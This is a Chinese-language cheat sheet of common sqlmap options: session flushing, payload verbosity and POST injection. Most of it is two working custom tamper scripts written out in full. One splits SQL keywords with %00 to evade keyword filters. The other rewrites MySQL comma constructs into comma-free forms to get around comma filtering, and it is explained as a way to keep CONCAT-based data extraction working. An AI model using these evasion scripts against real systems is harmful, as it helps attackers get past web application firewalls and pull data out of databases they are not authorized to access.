sqlmap常用参数


0x01: flush session

参数是 `--flush-session`（清空当前目标已缓存的 session 数据，让 sqlmap 重新进行注入探测，而不是沿用上次的结果）。

0x02: 显示详细payload

  • `-v LEVEL`（0–6，默认 1），也可以写成 `-vv`、`-vvv` 这样的重复形式
  • 要看到实际发送的注入 payload，需要 `-v 3` 及以上；`-v 4` 起还会打印完整的 HTTP 请求，`-v 5`/`-v 6` 再加上响应头和响应正文

0x03: POST注入

用 `-r request.txt` 指定一个抓好的原始 HTTP 请求文件（包含请求行、请求头和 POST body），sqlmap 会自动从中识别可注入的参数；只想单独指定 POST 数据时也可以用 `--data`。

0x04: tamper

用法：`--tamper=脚本1,脚本2`（多个脚本用逗号分隔，脚本名即 tamper/ 目录下的文件名，不带 .py）

sqlmap 自带（位于 tamper/ 目录）

  • apostrophemask：把单引号替换成 UTF-8 全角形式
  • commalesslimit：把 `LIMIT M, N` 改写成 `LIMIT N OFFSET M`
  • commalessmid：把 `MID(A, B, C)` 改写成 `MID(A FROM B FOR C)`
  • space2comment：把空格替换成 `/**/`

自定义1

还有一些自己写的，模板如下（保存到 sqlmap 的 tamper/ 目录后，即可用 `--tamper=文件名` 调用）：


#!/usr/bin/env python
 
import re

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
 
__priority__ = PRIORITY.LOWEST
 
def dependencies():
    """Hook slot expected by sqlmap's tamper interface; this script needs nothing extra."""
    return None
 
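# Keyword -> the same keyword with a URL-encoded NUL (%00) spliced in. Edit
# this table to target other keywords; matching is case-insensitive (see
# tamper() below), the replacement is inserted verbatim.
tamper_dic = {'select': 'se%00lect', 'from': 'fr%00om', 'where': 'wh%00ere'}


def tamper(payload, **kwargs):
    """
    Splits the SQL keywords listed in ``tamper_dic`` with a URL-encoded NUL
    byte (%00), e.g. ``SELECT`` -> ``se%00lect``.

    Keywords are matched case-insensitively as plain substrings (no word
    boundary). Only the matched keyword is rewritten; string literals,
    identifiers and everything else keep their original case, so a value
    such as ``'Admin'`` is not silently turned into ``'admin'``.

    Args:
        payload: the SQL fragment sqlmap is about to send; None or '' is
            returned unchanged.
        **kwargs: extra sqlmap context (unused).

    Returns:
        The payload with every listed keyword split by %00.

    >>> tamper("SELECT a FROM b WHERE c='Admin'")
    "se%00lect a fr%00om b wh%00ere c='Admin'"
    """
    if not payload:
        return payload

    for keyword, split_keyword in tamper_dic.items():
        pattern = re.compile(re.escape(keyword), re.IGNORECASE)
        # A callable replacement inserts the text verbatim, with no
        # backslash/group processing of the replacement string.
        payload = pattern.sub(lambda _match, _repl=split_keyword: _repl, payload)
    return payload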

通过修改 tamper_dic 可以在任意关键字中间插入 %00，用来绕过一些基于关键字匹配的过滤；是否有效取决于目标 WAF 和后端对 %00 的处理方式，需要实际验证。

自定义2


#!/usr/bin/env python
 
import re
 
from lib.core.enums import PRIORITY
 
__priority__ = PRIORITY.LOWEST
 
def dependencies():
    """Hook slot expected by sqlmap's tamper interface; this script needs nothing extra."""
    return None
 
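def tamper(payload, **kwargs):
    """
    Rewrites the comma-bearing MySQL constructs sqlmap emits into comma-free
    equivalents, for targets that filter ',' in the injected value.

    Handled forms:
      * TIMESTAMPADD(<unit>,<n>,NULL)  ->  NULL
      * MID(<expr>, <start>, <len>)    ->  MID(<expr> FROM <start> FOR <len>)
      * IF(<cond>,<a>,<b>)             ->  CASE WHEN <cond> THEN <a> ELSE <b> END
      * IFNULL(<expr>,<alt>)           ->  CASE WHEN <expr> IS NULL THEN <alt> ELSE <expr> END
      * LIMIT <offset>, <count>        ->  LIMIT <count> OFFSET <offset>

    IFNULL is rewritten with IS NULL rather than "=NULL": comparing anything
    with NULL yields NULL (never true) in MySQL, so a "=NULL" CASE would
    return NULL instead of <alt> and silently break CONCAT()-based extraction.

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Args:
        payload: the SQL fragment sqlmap is about to send; None or '' is
            returned unchanged.
        **kwargs: extra sqlmap context (unused).

    Returns:
        The rewritten payload string.

    >>> tamper('ISNULL(TIMESTAMPADD(MINUTE,7061,NULL))')
    'ISNULL(NULL)'

    >>> tamper('MID(VERSION(), 2, 1)')
    'MID(VERSION() FROM 2 FOR 1)'

    >>> tamper('IF(26=26,0,5)')
    'CASE WHEN 26=26 THEN 0 ELSE 5 END'

    >>> tamper('IFNULL(NULL,0x20)')
    'CASE WHEN NULL IS NULL THEN 0x20 ELSE NULL END'

    >>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'
    """

    def _scan_call(text, args_start):
        """Scan the argument list starting at ``args_start`` (just after the
        opening paren). Returns (indices of top-level commas, index of the
        closing paren); the closing index is None when the parens never
        balance."""
        depth = 1
        commas = []
        for i in range(args_start, len(text)):
            char = text[i]
            if char == '(':
                depth += 1
            elif char == ')':
                depth -= 1
                if depth == 0:
                    return commas, i
            elif char == ',' and depth == 1:
                commas.append(i)
        return commas, None

    def _commaless_if(text):
        """IF(c,a,b) -> CASE WHEN c THEN a ELSE b END, leftmost first, until
        no well-formed IF( remains."""
        while True:
            index = text.find("IF(")
            if index < 0:
                break
            args_start = index + len("IF(")
            commas, end = _scan_call(text, args_start)
            # Stop rather than loop forever on an unbalanced or one-arg IF(.
            if len(commas) < 2 or end is None:
                break
            # The first top-level comma ends the condition; the last one
            # starts the ELSE branch (a malformed extra comma lands in THEN).
            cond = text[args_start:commas[0]]
            then_val = text[commas[0] + 1:commas[-1]]
            else_val = text[commas[-1] + 1:end]
            rewritten = "CASE WHEN %s THEN %s ELSE %s END" % (cond, then_val, else_val)
            text = text[:index] + rewritten + text[end + 1:]
        return text

    def _commaless_ifnull(text):
        """IFNULL(x,y) -> CASE WHEN x IS NULL THEN y ELSE x END, leftmost
        first, until no well-formed IFNULL( remains."""
        while True:
            index = text.find("IFNULL(")
            if index < 0:
                break
            args_start = index + len("IFNULL(")
            commas, end = _scan_call(text, args_start)
            if not commas or end is None:
                break
            expr = text[args_start:commas[-1]]
            alt = text[commas[-1] + 1:end].lstrip()
            # IS NULL, not "=NULL": x=NULL is never true in MySQL, which
            # would make the CASE return NULL instead of the fallback.
            rewritten = "CASE WHEN %s IS NULL THEN %s ELSE %s END" % (expr, alt, expr)
            text = text[:index] + rewritten + text[end + 1:]
        return text

    if not payload:
        return payload

    result = re.sub(r'(?i)TIMESTAMPADD\(\w+,\d+,NULL\)', 'NULL', payload)
    result = re.sub(r'(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)', r'MID(\g<1> FROM \g<2> FOR \g<3>)', result)
    result = _commaless_if(result)
    result = _commaless_ifnull(result)
    result = re.sub(r'(?i)LIMIT\s*(\d+),\s*(\d+)', r'LIMIT \g<2> OFFSET \g<1>', result)
    return result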

这个脚本命名为 commalessmysql（放入 tamper/ 目录，用 `--tamper=commalessmysql` 调用），用于把 MySQL 中带逗号的表达式（TIMESTAMPADD、MID、IF、IFNULL、LIMIT）改写成等价的无逗号形式，以绕过对逗号的过滤；注意 IFNULL 的改写必须用 `IS NULL` 而不是 `=NULL`，因为 MySQL 中任何值与 NULL 比较都不为真，否则遇到 NULL 字段时 CASE 会返回 NULL，导致 CONCAT 拼接的整行数据丢失。

